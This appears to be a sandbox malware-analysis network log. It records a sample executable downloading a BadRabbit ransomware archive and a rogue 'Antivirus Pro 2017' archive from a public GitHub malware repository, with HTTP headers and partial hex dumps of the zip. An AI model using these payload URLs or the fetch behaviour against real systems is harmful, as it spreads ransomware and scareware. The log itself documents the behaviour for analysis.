                                                                                                                                                    2022-09-29 12:58:47 UTC191OUTGET /Endermanch/MalwareDatabase/master/ransomwares/BadRabbit.zip HTTP/1.1
                                                                                                                                                    Host: raw.githubusercontent.com
                                                                                                                                                    Connection: Keep-Alive


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    70140.82.121.3443192.168.2.349742C:\Users\user\Desktop\07bb0738.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2022-09-29 12:59:05 UTC9872INHTTP/1.1 302 Found
                                                                                                                                                    Server: GitHub.com
                                                                                                                                                    Date: Thu, 29 Sep 2022 12:57:10 GMT
                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                    Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                                    Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                                                                                                    Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/rogues/Antivirus%20Pro%202017.zip
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                    X-Frame-Options: deny
                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                    Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                    Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                                                                                    2022-09-29 12:59:05 UTC9872INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                                                                    Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    71192.168.2.349743185.199.108.133443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2022-09-29 12:59:05 UTC9874OUTGET /Endermanch/MalwareDatabase/master/rogues/Antivirus%20Pro%202017.zip HTTP/1.1
                                                                                                                                                    Host: raw.githubusercontent.com


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    72185.199.108.133443192.168.2.349743C:\Users\user\Desktop\07bb0738.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2022-09-29 12:59:06 UTC9874INHTTP/1.1 200 OK
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 813771
                                                                                                                                                    Cache-Control: max-age=300
                                                                                                                                                    Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                    Content-Type: application/zip
                                                                                                                                                    ETag: "1678d463fe21840e0502334b52db05d49c7f0867ee8fb74db3e4927c4d982da5"
                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                    X-Frame-Options: deny
                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                    X-GitHub-Request-Id: 3596:11E0C:3902DE:4007EA:6335934F
                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                    Date: Thu, 29 Sep 2022 12:59:06 GMT
                                                                                                                                                    Via: 1.1 varnish
                                                                                                                                                    X-Served-By: cache-mxp6944-MXP
                                                                                                                                                    X-Cache: HIT
                                                                                                                                                    X-Cache-Hits: 1
                                                                                                                                                    X-Timer: S1664456346.885821,VS0,VE200
                                                                                                                                                    Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                    X-Fastly-Request-ID: b45c16144ec4aa301a96e0061216347e48a09ce2
                                                                                                                                                    Expires: Thu, 29 Sep 2022 13:04:06 GMT
                                                                                                                                                    Source-Age: 0
                                                                                                                                                    2022-09-29 12:59:06 UTC9875INData Raw: 50 4b 03 04 14 00 01 00 08 00 cc 71 b9 46 6e c1 a3 ac 07 6a 0c 00 55 c0 0c 00 1f 00 00 00 45 6e 64 65 72 6d 61 6e 63 68 40 41 6e 74 69 76 69 72 75 73 50 72 6f 32 30 31 37 2e 65 78 65 25 07 aa cf 03 18 83 7f 90 f2 82 f4 4a c8 91 04 12 f4 c4 35 54 d1 11 fd 0b 95 82 b9 13 b7 bf ef ba 38 2e 1d 4b d8 08 b2 b2 43 b5 a3 c0 d7 77 ed 2b c1 26 7f 20 26 33 e5 c7 4d 54 26 f0 44 95 ed 24 60 75 a5 2f 65 d6 52 1e 72 1c ea 7f a8 b3 3d 44 30 b5 dc dc db 90 fe 82 c7 fd 4f 86 8d 27 85 b6 72 8e ae 12 2a ad b0 25 90 de 7a 75 d2 aa 99 19 f6 fd 5d 6e 54 90 91 de 62 38 63 db c3 14 35 94 7b 01 85 fb c5 24 57 65 48 4b 7c b8 4f 63 62 d8 e8 e9 04 68 da 36 23 dc 71 44 85 2a 59 00 ea 11 b8 97 f1 d7 5c 82 74 12 86 14 b2 3f 6d 49 f9 0b 3b d7 5f 0f 8d 62 6d f9 90 02 8f e6 1d e4 fc 16 80
                                                                                                                                                    Data Ascii: PKqFnjUEndermanch@AntivirusPro2017.exe%J5T8.KCw+& &3MT&D$`u/eRr=D0O'r*%zu]nTb8c5{$WeHK|Ocbh6#qD*Y\t?mI;_bm
                                                                                                                                                    2022-09-29 12:59:06 UTC9876INData Raw: ab 17 0e e6 c8 5b cb 31 0a 45 d9 4a 0a c4 83 75 cc a9 18 a7 40 ea b7 a4 d2 74 26 d3 2b 1c 6f 4f a0 b9 42 9d 20 41 5c 90 0e 71 73 d2 5c e6 6d db ac 4e bd e8 5c 44 ce 6c 69 8f 0a 3e c6 39 20 df cc a3 69 36 23 ff 5b df f6 c2 dc c4 48 f5 d8 15 b5 b5 12 ae 71 3c 3d 27 e3 ef e6 f8 dc 33 b1 04 a8 e2 c9 d6 10 02 10 6f 56 b9 21 70 58 e3 33 0b 3f fc 79 c5 97 c8 88 b9 31 35 39 b0 a7 e6 09 78 c1 da 3e ad 71 dc 0b bf 6f a7 d3 a6 2b 84 a6 7f fd 4c c4 f5 d6 84 36 22 eb 3c 2c a8 54 8d f9 41 d2 56 d4 f2 03 52 a5 87 7f a5 ed a3 cd ef b8 8a b0 0b ca 1d fe 27 74 0c 4e 32 7a 0b c6 2a 4c 19 5b 28 d3 60 e0 bb d8 e6 b7 94 84 2a fa b8 fe c2 24 61 73 97 0f 42 52 bc 24 c1 9e a2 e5 8d f6 55 96 4c 13 2b f5 09 3c da f6 b4 44 49 78 78 5c 22 c8 59 27 30 78 39 6f f2 04 12 ee e7 65 ab e2
                                                                                                                                                    Data Ascii: [1EJu@t&+oOB A\qs\mN\Dli>9 i6#[Hq<='3oV!pX3?y159x>qo+L6"<,TAVR'tN2z*L[(`*$asBR$UL+<DIxx\"Y'0x9oe
                                                                                                                                                    2022-09-29 12:59:06 UTC9878INData Raw: 14 58 9b 98 fa 4d c0 77 31 1b 88 fb 5c 32 b8 22 ff 90 76 c7 38 66 10 fe ce f7 1f 2c d9 f6 34 87 bb 52 fa f2 bc 9b 5d 17 46 84 58 8f e4 62 44 94 f4 62 55 f2 3f c3 e3 ab 5d ee 12 57 7d c4 60 cc 2f 04 5f 4d 81 ec 05 d7 62 15 66 68 5d 02 7c a8 2d c4 42 01 4b ed c5 13 6e 6c c3 d3 b2 b4 3c 81 57 b2 ad 21 69 a6 6a 1c e4 40 71 80 d1 46 7a 76 24 b3 b4 3c e1 44 57 40 9c 3a 89 ac 29 80 a3 c1 dc 48 9c 44 da e1 cf dc a7 2e 9c dd 54 ee b0 0d 99 bc 31 7f 66 1a 33 1b f2 03 83 82 6b 0e cf 22 99 d7 4a b4 48 2d 85 51 ac 95 d9 7b d6 37 5a f5 df 47 d2 5c 22 fd 86 73 02 0a a0 46 f7 c6 fb 97 1a 71 68 16 88 27 b3 f4 8d 14 4d e4 1d 94 84 a1 03 de 16 e4 3f 5a f7 a4 97 2e 50 e9 5c 19 7b 07 ac 2e 50 5f f1 a7 c1 13 c3 d7 8e b2 c6 4a cf 72 c4 08 d6 e7 2d e0 c6 c9 47 85 29 bc 78 99 46
                                                                                                                                                    Data Ascii: XMw1\2"v8f,4R]FXbDbU?]W}`/_Mbfh]|-BKnl<W!ij@qFzv$<DW@:)HD.T1f3k"JH-Q{7ZG\"sFqh'M?Z.P\{.P_Jr-G)xF
                                                                                                                                                    2022-09-29 12:59:06 UTC9879INData Raw: 50 77 6c e2 c9 08 2f 4d a0 aa 5b 75 b5 16 d3 ae 83 5d 3a f4 68 f4 ee 37 96 d4 08 10 15 57 ab 80 84 f2 f7 be 30 29 ba eb e2 35 bf e2 14 a4 4c 2b 71 97 8d 12 18 27 0b 1f 12 8b f9 87 26 d7 34 d3 98 a8 41 d5 61 df 1c a5 83 48 c3 0c 55 d5 88 c2 77 e8 db fe 25 69 d2 5c f5 2d 48 a2 0b ef 83 9a fe 0d 3d 1a a1 c9 b8 b6 72 71 7f 09 27 69 5c af 31 00 83 eb ad bc bc 88 31 52 f2 d4 a0 35 5d 59 53 ed b3 a0 f9 9b 92 0b f0 e0 e8 3c 7c 74 f4 b9 36 bd 39 ca ae 78 a4 fb 7f f0 88 14 67 b1 47 25 97 cf 33 19 08 7a 4d 73 7f d8 9c a6 e9 18 a0 25 af 1e 43 b3 4f 76 cf ce da 0b b4 32 ed b0 c0 9c 87 83 e4 6d 10 0a 38 dc 4d c4 42 f9 2e 92 25 c7 43 bb 7c 5d 6f 82 f4 9d 47 04 a2 b8 2d 19 14 da 6d 55 6a ea 12 a4 10 02 2b e9 73 40 f5 ba d9 62 79 fe 49 d6 96 4a 46 04 6c 2f 06 19 84 ae 20
                                                                                                                                                    Data Ascii: Pwl/M[u]:h7W0)5L+q'&4AaHUw%i\-H=rq'i\11R5]YS<|t69xgG%3zMs%COv2m8MB.%C|]oG-mUj+s@byIJFl/
                                                                                                                                                    2022-09-29 12:59:06 UTC9880INData Raw: e6 80 9f 29 7b 8d 25 22 f4 24 50 b6 de 37 65 cf f0 86 79 3b 2d 1d bc 2e 36 be 98 1d be 38 55 6d 72 c6 c5 24 ef fe b2 e6 4b b3 01 a4 69 88 bf 7f c4 db 7f 2f e3 41 73 8b 6e 33 92 99 3f 48 fe fc 52 f3 96 fa e5 8c 14 6f f6 c2 bd c7 7a 81 d0 25 a7 b6 d6 23 47 6f 4f 0a 73 56 77 06 72 1d 74 f6 e3 c6 c9 46 1f 9a a0 d2 a0 99 78 a7 3a 64 f8 ac fd 9f b9 f6 bb bf ef 4a 6d 27 3a 46 91 ed 65 50 a1 ae 76 58 32 14 96 a4 76 c0 36 39 de ea fa 3d 5e eb 0e e8 02 c3 5c 57 b2 91 34 74 dc 84 04 82 df 1e 36 06 ff ff 6e 3f a8 38 ec 23 be 00 92 d0 de f8 5c 08 ae 5b e4 69 dd c2 cf 9d e0 0b 16 4c 4c 92 ad 2a e5 f2 02 4d bd 42 05 36 8e 6d 5f 2c 8f a1 5b 50 34 bf 39 95 5b 50 bd d4 89 98 9c c7 6a 72 df da 56 7a 13 80 a7 4b 2a 4d c7 7b 6e d1 b5 da 2d f9 f6 5c 1f f4 c3 26 05 14 ad d9 70
                                                                                                                                                    Data Ascii: ){%"$P7ey;-.68Umr$Ki/Asn3?HRoz%#GoOsVwrtFx:dJm':FePvX2v69=^\W4t6n?8#\[iLL*MB6m_,[P49[PjrVzK*M{n-\&p
                                                                                                                                                    2022-09-29 12:59:06 UTC9882INData Raw: 72 27 a8 80 09 bf b5 57 dd 6a cf b4 13 ad b8 7d ec 4c 09 dd 62 29 5b 56 5a 08 75 da 61 08 15 d4 15 9b 31 92 1c 47 01 03 d0 ba 8b fb 0e 75 8b 3f e0 00 4f 8b 30 d9 2d 0f be e3 29 6f 23 bf 08 22 f3 c1 54 ae 2b f6 52 95 01 d0 be e3 58 d5 ad 12 a0 74 8c 09 6b 30 04 b2 22 5f f6 b5 ac 38 3d 05 63 d7 46 98 9f 2e 68 ee 0b 1b 04 1d 76 37 a1 35 24 9a c8 7a ff a1 08 0c 47 db 08 5d d2 d4 70 e1 97 29 69 90 36 c0 a8 be ec 8c 05 91 60 c0 78 14 9a d1 65 e3 1f 1f 18 16 7d ee 47 bb 14 cf 73 ab 11 64 27 17 21 60 f1 df bc df 35 49 0d a7 39 74 bc 4f 21 b8 16 b0 f2 b1 fa 5e 90 38 56 28 12 b1 ec ad 04 59 8c d0 72 33 21 d8 6b ec d3 6e ff 6c a7 3f bc 0e 21 d0 5e b0 3a ef 3e 03 43 e8 d8 c8 3f 37 3b 4a 86 50 aa 71 bc 87 4e 47 26 46 12 fb d1 50 63 28 74 85 55 8d 43 bb 46 01 77 23 67
                                                                                                                                                    Data Ascii: r'Wj}Lb)[VZua1Gu?O0-)o#"T+RXtk0"_8=cF.hv75$zG]p)i6`xe}Gsd'!`5I9tO!^8V(Yr3!knl?!^:>C?7;JPqNG&FPc(tUCFw#g
                                                                                                                                                    2022-09-29 12:59:06 UTC9883INData Raw: 74 e7 23 8e 88 b3 29 9d 28 d3 c1 b7 d7 e2 47 d9 0c 02 4a 3b 7b c3 d3 5a 63 3b 8d 53 3e 4f c7 e1 a9 15 da 66 6b 2d b2 45 c2 73 5d a8 39 00 12 44 93 27 96 b6 05 84 d0 b5 52 c1 3e cd 21 80 04 40 0c 2c 4f fa 13 b7 58 f6 ce 0e f5 19 35 0e 83 a3 a5 09 31 6d 08 a8 7b 39 47 78 48 a8 1a 34 1d dc c9 3f 90 df b6 5c 94 3f 4a 68 5a 6f dc a0 9a 5a 1e b5 73 e6 00 ca 44 6a 98 6d a8 a9 f2 23 fe b6 14 9e 0f 36 3e e5 b4 39 fb b1 1b 5c 03 35 08 b2 e3 3d e0 af 31 35 a4 eb 47 96 aa 94 f2 5e b6 88 4b 44 06 1d 38 e5 4a 80 aa 3b 8d 74 f0 a1 08 2c ae 68 70 04 74 d0 e7 9d f0 00 31 f6 84 1f 11 80 d1 ef c6 af 87 9e ba 12 96 17 51 44 e1 93 15 12 3b 5a 9d c1 53 1f f5 53 5f 85 a4 8c 00 25 3e bc d1 16 c2 79 e5 cd 10 6f f7 44 8a 2d e0 5e 93 28 32 7d b8 16 16 ad dc e9 54 0b 0c 9b a5 20 16
                                                                                                                                                    Data Ascii: t#)(GJ;{Zc;S>Ofk-Es]9D'R>!@,OX51m{9GxH4?\?JhZoZsDjm#6>9\5=15G^KD8J;t,hpt1QD;ZSS_%>yoD-^(2}T
                                                                                                                                                    2022-09-29 12:59:06 UTC9884INData Raw: 1f ff 29 bc 49 cd a0 82 e3 59 81 a0 4e fd bf 0b e6 fa f2 ee c5 c2 46 eb a0 53 fa b0 fe 86 93 f1 4c ed 6c 67 42 f2 5a e0 a1 9f d2 25 3f 27 1b bc 00 57 ca c0 66 c7 48 0c 31 30 6b f6 09 56 c9 3c bc 41 a4 06 41 6e f2 6b 06 3a 73 dc b9 21 e2 d2 7a 9c 20 17 3d 5c 33 36 80 20 e0 d2 af 6b 7d fe d5 e7 1a 45 a4 3d 3d c7 12 d7 6e ed ee c5 c5 19 71 57 2d ab 1d d6 6d 79 54 be ca 81 7c b6 c1 94 ea 2a 12 98 60 af 89 cd 3c 22 cf e5 07 02 63 46 8a f8 d7 d7 1d 4e b1 aa 1e b8 37 c7 37 20 4c 70 29 13 9c 8a 1c b4 10 88 df 25 51 09 46 49 12 20 e5 c0 56 75 81 1f 59 1f e4 b5 cc d9 5d 17 a3 1a 9c 20 3c b1 11 af 58 76 c5 39 e7 eb 30 80 ed 36 d1 9c f0 0d dc f8 b3 2e 43 6f 19 06 c3 fb b4 8f 59 e1 6a df 82 44 6b a8 d1 32 1b 3e 75 d3 37 0b a2 21 38 5d 7f e4 cb 07 cd 55 ec b7 55 1b ef
                                                                                                                                                    Data Ascii: )IYNFSLlgBZ%?'WfH10kV<AAnk:s!z =\36 k}E==nqW-myT|*`<"cFN77 Lp)%QFI VuY] <Xv906.CoYjDk2>u7!8]UU
                                                                                                                                                    2022-09-29 12:59:06 UTC9886INData Raw: 84 11 33 65 90 c7 3e 15 20 70 29 bb 5f de d4 91 ba 1d ad 66 a5 56 36 72 13 b2 30 42 f8 bd 5c 22 36 a2 03 7c 53 4f 30 a4 a2 d5 7d 63 54 e2 e5 31 f2 b6 28 7b 9a 6f d1 45 d7 bb b5 7b 17 0a 85 c0 71 e6 6a 28 f4 3a 72 fb b8 fe 0a 73 24 1b e8 39 56 30 1b 54 64 a7 24 1e 2b 6e 3b 34 58 b3 da 94 1a 34 f8 2f 1d c9 8a 23 48 df 62 59 a8 15 04 01 9f 67 51 88 d9 63 94 f6 8d de 0a 69 48 73 05 bc de 50 5d ab 34 62 ac c3 3a 2d 40 12 5e 43 15 5d 0b fd 98 85 e7 16 66 1f 4a 3e da a5 45 74 10 5d 49 10 4c ab 8b 9d 5b 68 5f 8e 84 cd ba 3d a0 47 7b 6a 1b cf 18 ed a5 2e fd eb 95 f1 85 36 98 e0 a1 a5 19 e7 84 74 fd 78 7c 22 e0 08 4e e3 0c 32 02 98 32 bd f5 e4 23 66 c9 59 87 e5 b9 ec 5a de 04 49 d6 61 ad c0 9b 69 72 8a a4 f4 ba d7 a7 9a 1d ea 79 c5 79 9d 32 ca fe 7e 51 3e 4a 8f fe
                                                                                                                                                    Data Ascii: 3e> p)_fV6r0B\"6|SO0}cT1({oE{qj(:rs$9V0Td$+n;4X4/#HbYgQciHsP]4b:-@^C]fJ>Et]IL[h_=G{j.6tx|"N22#fYZIairyy2~Q>J
                                                                                                                                                    2022-09-29 12:59:06 UTC9887INData Raw: 0a 75 af d5 23 38 e8 aa d7 84 10 18 c9 a5 a3 31 c2 b9 93 37 3c 16 15 ed 69 1d 06 51 32 14 37 a9 0b fb 00 ab f9 01 98 7e 3e 09 b7 09 1e a7 b4 37 5a 5a 6c 15 e7 23 93 7e da 40 f5 c0 e6 50 b0 fd a8 0b f9 4a 29 36 a5 e1 c8 d1 36 94 9b 88 3b 17 8e 4a 6f 0a a9 1a 2e 77 59 cd f0 00 e6 2a 1d 16 06 9a 96 1e 0e c0 c7 2c 7a f2 68 a1 bf e1 ed f9 0d b5 6a 3b 4c c9 25 12 ed ad 6c 80 5a 4a 12 98 94 bc 41 ef 12 a6 d1 88 17 7c 40 80 16 fb 2b d8 66 2e ca 87 ac df 0d 0f 66 dd a1 19 dc 74 bb c9 a5 1d 66 60 a3 91 f2 4f 3b 2a 0c e9 27 d5 73 9f 8a 6b ea 7c f8 78 dc 2f 69 82 87 d2 1e 17 c1 00 ce 6a 65 25 0f 4a af 20 c4 36 f0 46 bb 79 ee c5 35 19 03 ca 63 c1 d0 1d 43 eb e2 22 d8 bf 4e 20 ec c2 04 d7 fb 0e 34 c8 f2 e3 69 0c 1f ad 67 85 60 a6 d3 b0 e0 00 78 d5 02 70 2e 98 fb b3 9e
                                                                                                                                                    Data Ascii: u#817<iQ27~>7ZZl#~@PJ)66;Jo.wY*,zhj;L%lZJA|@+f.ftf`O;*'sk|x/ije%J 6Fy5cC"N 4ig`xp.
                                                                                                                                                    2022-09-29 12:59:06 UTC9888INData Raw: 8f a4 87 bf 85 d4 d7 5d 75 1a 94 0b 1f f4 6c 81 8d 3d 6c d4 58 70 ed 5b b0 e3 7c 90 f2 f9 dc 8f 1c 55 2c c5 ce 9e b0 b3 d2 eb a4 ef ed dd 2a c0 1e 48 7b e8 9f b4 45 8b 30 7a 6a 0b ba 00 8c 40 b6 42 50 c3 92 27 78 b3 b4 af 08 36 0c b9 ea 13 f4 11 fc 1c 99 91 7b 7a bd 53 ed b5 47 07 b0 a4 c6 a7 ea db 87 e4 18 46 18 67 ba 1e 1c 23 63 88 a4 42 70 48 2b 9a 09 b6 6e af ab 0f 4c 82 70 9c 95 b7 fc 5a 14 99 66 45 a4 29 f5 65 83 ec 07 bc 36 83 d0 71 d8 90 0e 3e f2 25 3b 1e de e3 f9 17 37 c2 50 01 af 7c 19 ba cb a7 57 62 f8 f0 42 e6 e5 49 3e 92 0a f2 ef 59 bc 9c 95 b8 3a 88 25 34 46 00 53 6f f4 78 bf f9 14 c9 7f e8 1d a8 8a 30 3c 01 30 0c 61 fe d0 e2 92 40 ca 52 e0 8b 87 c6 2c fd f8 7e 19 f6 0b df ba a5 d0 80 84 50 24 03 9b da 7c 0f 24 06 f8 04 dc 23 f2 2e 39 5f e1
                                                                                                                                                    Data Ascii: ]ul=lXp[|U,*H{E0zj@BP'x6{zSGFg#cBpH+nLpZfE)e6q>%;7P|WbBI>Y:%4FSox0<0a@R,~P$|$#.9_
                                                                                                                                                    2022-09-29 12:59:06 UTC9890INData Raw: 50 b9 8e 21 3f ba 22 7a 56 6d e0 14 46 21 eb 84 8e 43 15 f1 f5 a0 7c 53 a1 8d 0d 20 dd bb 95 3a e1 b9 59 7c 87 27 52 7b e8 2c 04 08 56 c7 41 01 44 18 2a f1 2f 24 d3 e7 58 35 59 f4 a8 6a 09 e9 4a a6 af f9 4e f5 b4 e4 e3 93 63 d9 38 cc 2c 36 b1 6c 7a c3 f4 79 d5 30 9a 76 32 d2 7a 15 27 39 52 fe 17 c3 85 33 d5 6e a1 36 50 8e 2b 76 8f 83 0e 0d 99 df 9a 4d 20 46 79 03 7a 2f 05 67 d8 15 0a 12 4f 23 ad f3 e5 b3 1f ac 2b f6 77 66 34 9b da b3 1c b7 d8 db 58 ec d2 3f 30 5a 37 e7 ac 4a cb 16 3e 8d ff 07 e5 d6 69 f7 94 cc 1a e1 cd 66 3b d4 82 18 78 78 1f d5 76 b3 36 cf 5e 80 9f a0 fd ae 63 2c f4 06 b7 74 39 ca c2 0f 08 06 97 66 d4 ba d6 19 a0 56 1f 41 29 3f 91 4b b0 d4 4e ad b0 22 dc a3 17 e9 f3 8f fe 49 9b 96 d8 ac 7d 80 8b d5 9a 17 e3 2b ca df 8d d2 46 44 db 25 69
                                                                                                                                                    Data Ascii: P!?"zVmF!C|S :Y|'R{,VAD*/$X5YjJNc8,6lzy0v2z'9R3n6P+vM Fyz/gO#+wf4X?0Z7J>if;xxv6^c,t9fVA)?KN"I}+FD%i
                                                                                                                                                    2022-09-29 12:59:06 UTC9890INData Raw: 16 67 a8 c6 ac 31 91 5a 31 e8 c7 bc 4e d5 4f 2d b5 2e 2d 33 00 2f 11 96 dd 06 a5 ad 04 01 71 b2 2e 47 9f 82 1a 53 d6 c9 b5 54 ae 46 63 11 d5 a9 e5 e0 79 3d 69 4a a8 4d ee 10 bf 05 8d cf 7b f1 09 08 4e bb 45 54 c4 b2 7d fb 65 db 5b 6a 63 a9 36 32 1a c5 e4 6a 50 ed 21 a8 7b c4 4e fb 39 04 a1 d9 04 0c f4 cf b5 18 88 83 06 59 dd 2b 43 41 8e f8 e6 93 73 d4 b2 40 f7 16 8b 31 e2 f5 97 a0 cb 52 96 9f 2c e6 cc 84 2f 8c b8 d2 e7 51 c9 29 bc 05 8f 34 d8 d9 3c b6 0b 93 40 42 58 79 55 7d 42 d1 ae d4 e9 f0 e1 8a 1f 6d a5 ad f1 77 ce e5 8d 76 af a2 5f af 90 e7 a4 86 7b 37 7f a3 ec 79 2c 3f 19 56 84 16 5b c9 9e 3b ae 9f 77 44 d7 6d a3 d1 ee fa 34 66 8c 41 f9 4e 7a f1 d3 14 3d fa 1d c6 44 86 04 59 f8 0c 64 85 47 5f 23 38 39 74 8e 0e dc 8f 1a 30 d7 b5 e1 f2 fa 4e b1 a4 2a
                                                                                                                                                    Data Ascii: g1Z1NO-.-3/q.GSTFcy=iJM{NET}e[jc62jP!{N9Y+CAs@1R,/Q)4<@BXyU}Bmwv_{7y,?V[;wDm4fANz=DYdG_#89t0N*
                                                                                                                                                    2022-09-29 12:59:06 UTC9906INData Raw: 3a f7 1b c9 fa 5d 62 9b 58 9f 90 d9 f1 e4 f9 07 9e 81 b8 ea 58 48 75 e0 57 13 dc 1b 3e 35 a8 3a 09 5d d3 ed 6d 3a b5 23 ef 68 72 ec e7 1a 8c 82 9a 61 1c 19 67 80 b0 8e b2 6d 4b 7c 1e 6c 02 d8 2a 50 6b 63 ba 9f cd 75 a4 b5 d7 a0 a0 58 d8 ce 10 2a 88 a1 79 09 a4 b8 e9 9e 36 7c b1 cd bf 25 75 ba 55 9a f5 36 4f cb 4b 46 ab 6f 3c 19 72 11 cc 3d 6e 27 11 e9 78 1a 55 18 45 4b 7c 6e 77 2f ee 12 9e 61 87 95 c2 b0 0c 32 8b 9a 65 5b d5 b8 be db 8c 27 b0 15 ef 62 47 04 15 a3 d1 6b f5 44 86 56 ca 1b 42 c7 3f 9e 9f 61 55 7f 22 54 b8 4a f1 23 69 93 69 90 c7 fc aa bf 44 74 0c fd 68 8d e5 0a c6 fb 41 20 f0 bb 73 62 ca 30 be 7f 5a be ae ba c4 8a 41 5d 83 07 df b5 33 4a 98 d7 d3 5e b4 f6 1b b1 68 65 8d a0 25 07 d3 44 b9 c2 08 d9 d3 2b 53 94 4f b8 ea 85 a9 29 ad 29 87 1b 33
                                                                                                                                                    Data Ascii: :]bXXHuW>5:]m:#hragmK|l*PkcuX*y6|%uU6OKFo<r=n'xUEK|nw/a2e['bGkDVB?aU"TJ#iiDthA sb0ZA]3J^he%D+SO))3
                                                                                                                                                    2022-09-29 12:59:06 UTC9922INData Raw: ec b5 cb 41 6e 1b 97 5c b2 78 5c 93 e4 a4 19 1b 40 33 ad f7 7d 7d 2b a3 7a e9 7c 64 35 1b 43 6a a5 b9 61 2a 45 dd ec f7 15 69 e3 cb 05 32 1e 83 29 17 3c 0f 1c eb 0a 80 7f 3b 38 93 b0 c3 5f 1e 47 85 43 8b 5f ff de 25 58 62 8e 9b 55 42 52 31 8b 54 50 5f e2 38 64 36 83 21 9f 86 93 4c 0f ea 63 7c d3 96 9c fa ac 58 1f a8 d9 12 20 8d 2f 6e d2 f1 38 2e 23 ab f6 63 7c 8a ac b4 f5 ba 02 fb 31 16 45 70 1f 4f 15 a1 28 5c ee e1 6f 2a 2f 4f b0 37 bd c6 00 55 7e 52 ee be 60 ad ee 4f 4c bb b6 e5 f8 c6 f7 62 ea 7e f1 af 35 b2 3b e6 82 9b 78 b8 b5 92 e4 e2 9f b6 0e 96 6c f9 24 20 08 2a ad 0a 44 18 2c e4 15 a9 a2 3f 2e 8c 34 1f d0 58 46 03 c9 66 26 9a d4 32 a6 42 72 f9 5b 32 78 f0 4b e4 80 65 66 88 b1 32 59 47 a9 73 dc 48 56 32 3a d5 b1 61 a8 0b 0a bb 80 ed cb 92 d0 7d 8d
                                                                                                                                                    Data Ascii: An\x\@3}}+z|d5Cja*Ei2)<;8_GC_%XbUBR1TP_8d6!Lc|X /n8.#c|1EpO(\o*/O7U~R`OLb~5;xl$ *D,?.4XFf&2Br[2xKef2YGsHV2:a}
                                                                                                                                                    2022-09-29 12:59:06 UTC9938INData Raw: c8 d5 61 90 d0 a8 00 3a 9d ea 44 e1 c5 ea f8 82 58 4d d4 d2 bd f2 b6 7f 2f c8 d1 04 dc c4 52 f0 3d ec 28 21 41 e1 aa d0 1c 1e db eb e9 8c 36 84 bd 92 4b 23 df 1d aa b3 9e b2 4d 84 55 35 7a 4d 08 ac c0 01 01 8a d2 71 1c 08 ef 9e 0a 0b e8 f5 ae 1c 3d 4a 99 e0 4e 4d 63 bd 29 82 eb 5c db e2 a5 bd fb 8e ed e2 5e a3 92 b0 79 57 e6 a9 7c 0c 54 bf ff ff da d2 61 22 ee 0d 0d e5 ad 7b 25 42 35 cc d2 ef 5b d6 67 45 9b c8 8d f9 53 52 77 48 91 06 e1 9e 8b 63 18 99 d4 fb a5 c5 af 1b 3e b5 10 6b 62 09 12 8e fd 06 ac 7b 20 e1 d3 91 28 36 13 d5 44 d3 72 1b f4 d0 a8 c7 56 a5 aa 1d d8 0c 9c 2e b5 57 b3 94 51 78 5c 7b 1a 53 95 22 69 08 59 97 87 85 4b 76 81 69 97 31 6f 8a 07 98 d9 70 4c db a7 a1 7b 81 99 93 c2 84 5a bb c1 2c 86 ca 6d 5a 08 8a 8b 41 b4 d8 54 88 68 d8 ec 6b 64
                                                                                                                                                    Data Ascii: a:DXM/R=(!A6K#MU5zMq=JNMc)\^yW|Ta"{%B5[gESRwHc>kb{ (6DrV.WQx\{S"iYKvi1opL{Z,mZAThkd
